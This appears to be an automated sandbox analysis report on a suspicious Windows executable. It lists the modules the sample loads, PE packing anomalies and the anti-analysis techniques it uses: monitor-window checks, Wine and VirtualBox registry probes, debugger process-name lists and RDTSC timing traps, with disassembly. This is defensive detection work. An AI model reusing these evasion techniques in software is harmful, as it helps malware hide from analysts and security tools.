Source: A3nofpjN9A.exeString found in binary or memory: jeD/wDwmdF/+QqP+Fe+AP8AoRvB/wD4TOi//IVH/E9H/Vrf/N2//FEP+KVX/V+P/OX/AP5RD+Leiv7SP+Fe+AP+hG8H/wDhM6L/APIVH/CvfAH/AEI3g/8A8JnRf/kKj/iej/q1v/m7f/iiaf8AFK7/AKvv/wCcw/8Ayhn8W9Ff2kf8K98Af9CN4P8A/CZ0X/5Co/4V74A/6Ebwf/4TOi//ACFR/wAT0f8AVrf/ADdv/wAUTP8A4pVf9X4/85f/APlEP
Source: A3nofpjN9A.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: A3nofpjN9A.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSection loaded: kernel.appcore.dllJump to behavior
Source: A3nofpjN9A.exeStatic file information: File size 4482048 > 1048576
Source: A3nofpjN9A.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: A3nofpjN9A.exeStatic PE information: Raw size of jqefefdt is bigger than: 0x100000 < 0x1b9e00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\A3nofpjN9A.exeUnpacked PE file: 0.2.A3nofpjN9A.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqefefdt:EW;rpjpprvb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqefefdt:EW;rpjpprvb:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: A3nofpjN9A.exeStatic PE information: real checksum: 0x44acae should be: 0x44f8f5
Source: A3nofpjN9A.exeStatic PE information: section name:
Source: A3nofpjN9A.exeStatic PE information: section name: .idata
Source: A3nofpjN9A.exeStatic PE information: section name:
Source: A3nofpjN9A.exeStatic PE information: section name: jqefefdt
Source: A3nofpjN9A.exeStatic PE information: section name: rpjpprvb
Source: A3nofpjN9A.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CE80 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CE80 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CE80 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CE80 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E09A pushad ; ret 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E09A pushad ; ret 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E09A pushad ; ret 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E09A pushad ; ret 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E09A pushad ; ret 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E09A pushad ; ret 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E09A pushad ; ret 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_017FA548 push eax; ret 0_3_017FA551
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_017FA548 push eax; ret 0_3_017FA551
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_017FA548 push eax; ret 0_3_017FA551
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_017FA548 push eax; ret 0_3_017FA551
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_017FA548 push eax; ret 0_3_017FA551
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_017FA548 push eax; ret 0_3_017FA551
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E2DA push ss; ret 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E2DA push ss; ret 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E2DA push ss; ret 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E2DA push ss; ret 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E2DA push ss; ret 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E2DA push ss; ret 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180E2DA push ss; ret 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CDE0 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CDE0 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CDE0 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CDE0 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CDE0 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CDE0 push 000180D0h; iretd 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180CDE0 push 000180D0h; iretd 0_3_0180CEF5
Source: A3nofpjN9A.exeStatic PE information: section name: jqefefdt entropy: 7.955450902362483

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2EA75 second address: C2EA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2DCEC second address: C2DCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2DCF0 second address: C2DD04 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5FC0E77A06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5FC0E77A06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2DD04 second address: C2DD1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2DEDD second address: C2DEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5FC0E77A06h 0x0000000a jmp 00007F5FC0E77A0Ch 0x0000000f popad 0x00000010 push eax 0x00000011 jne 00007F5FC0E77A06h 0x00000017 push edi 0x00000018 pop edi 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2E31C second address: C2E323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2E323 second address: C2E354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F5FC0E77A06h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5FC0E77A0Eh 0x00000014 jmp 00007F5FC0E77A14h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2E354 second address: C2E358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C2E358 second address: C2E36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jg 00007F5FC0E77A0Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30B7C second address: C30B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30B80 second address: C30B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30C50 second address: C30C56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30C56 second address: C30CF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5FC0E77A10h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 5D18D3ABh 0x00000012 jnl 00007F5FC0E77A0Bh 0x00000018 push 00000003h 0x0000001a mov dword ptr [ebp+122D5719h], esi 0x00000020 push 00000000h 0x00000022 call 00007F5FC0E77A17h 0x00000027 mov esi, dword ptr [ebp+122D2A62h] 0x0000002d pop esi 0x0000002e push 00000003h 0x00000030 call 00007F5FC0E77A09h 0x00000035 jnl 00007F5FC0E77A14h 0x0000003b push eax 0x0000003c pushad 0x0000003d push ecx 0x0000003e jmp 00007F5FC0E77A16h 0x00000043 pop ecx 0x00000044 pushad 0x00000045 jmp 00007F5FC0E77A12h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30CF4 second address: C30D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007F5FC0CE52D0h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F5FC0CE52D5h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007F5FC0CE52C8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30D33 second address: C30D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov esi, dword ptr [ebp+122D279Ah] 0x00000010 add edx, 06B0D65Eh 0x00000016 popad 0x00000017 lea ebx, dword ptr [ebp+124529DAh] 0x0000001d or di, 54B7h 0x00000022 jnp 00007F5FC0E77A12h 0x00000028 je 00007F5FC0E77A0Ch 0x0000002e mov dword ptr [ebp+122D17DDh], edi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F5FC0E77A12h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30DDD second address: C30DEF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FC0CE52C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30DEF second address: C30DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30DF5 second address: C30E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30E08 second address: C30E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F5FC0E77A08h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F5FC0E77A08h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f call 00007F5FC0E77A09h 0x00000044 pushad 0x00000045 jns 00007F5FC0E77A16h 0x0000004b jo 00007F5FC0E77A0Ch 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30E7E second address: C30ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F5FC0CE52D3h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F5FC0CE52D5h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jno 00007F5FC0CE52D0h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30ECA second address: C30F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d and si, C905h 0x00000012 push 00000003h 0x00000014 mov dword ptr [ebp+122D24C3h], edi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D17EDh], ebx 0x00000022 add dh, FFFFFFE6h 0x00000025 push 00000003h 0x00000027 mov cx, 6761h 0x0000002b call 00007F5FC0E77A09h 0x00000030 pushad 0x00000031 jne 00007F5FC0E77A0Ch 0x00000037 js 00007F5FC0E77A0Ch 0x0000003d popad 0x0000003e push eax 0x0000003f jmp 00007F5FC0E77A0Bh 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 jng 00007F5FC0E77A14h 0x0000004e mov eax, dword ptr [eax] 0x00000050 pushad 0x00000051 push ecx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30F42 second address: C30F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30F4A second address: C30F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C30F58 second address: C30FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F5FC0CE52C8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 pushad 0x00000022 xor dword ptr [ebp+122D17DDh], edi 0x00000028 jmp 00007F5FC0CE52D2h 0x0000002d popad 0x0000002e lea ebx, dword ptr [ebp+124529E5h] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F5FC0CE52C8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D26FBh], edx 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c pop eax 0x0000005d push eax 0x0000005e jc 00007F5FC0CE52D0h 0x00000064 push eax 0x00000065 push edx 0x00000066 push ebx 0x00000067 pop ebx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4246B second address: C42489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C42489 second address: C4248D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C51800 second address: C51817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5FC0E77A06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jp 00007F5FC0E77A06h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C51817 second address: C5181B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5181B second address: C5183D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5FC0E77A16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4F81B second address: C4F820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4F820 second address: C4F825 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4F988 second address: C4F98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4F98E second address: C4F99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F5FC0E77A12h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4F99B second address: C4F9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4F9A1 second address: C4F9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0E77A0Ah 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jl 00007F5FC0E77A06h 0x00000012 jmp 00007F5FC0E77A12h 0x00000017 jnc 00007F5FC0E77A06h 0x0000001d popad 0x0000001e jmp 00007F5FC0E77A16h 0x00000023 jc 00007F5FC0E77A12h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4F9EF second address: C4F9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4FCAF second address: C4FCB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4FCB3 second address: C4FCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4FCB9 second address: C4FCD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F5FC0E77A12h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4FCD6 second address: C4FCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4FCDC second address: C4FCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jng 00007F5FC0E77A06h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4FE23 second address: C4FE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C4FE2E second address: C4FE40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
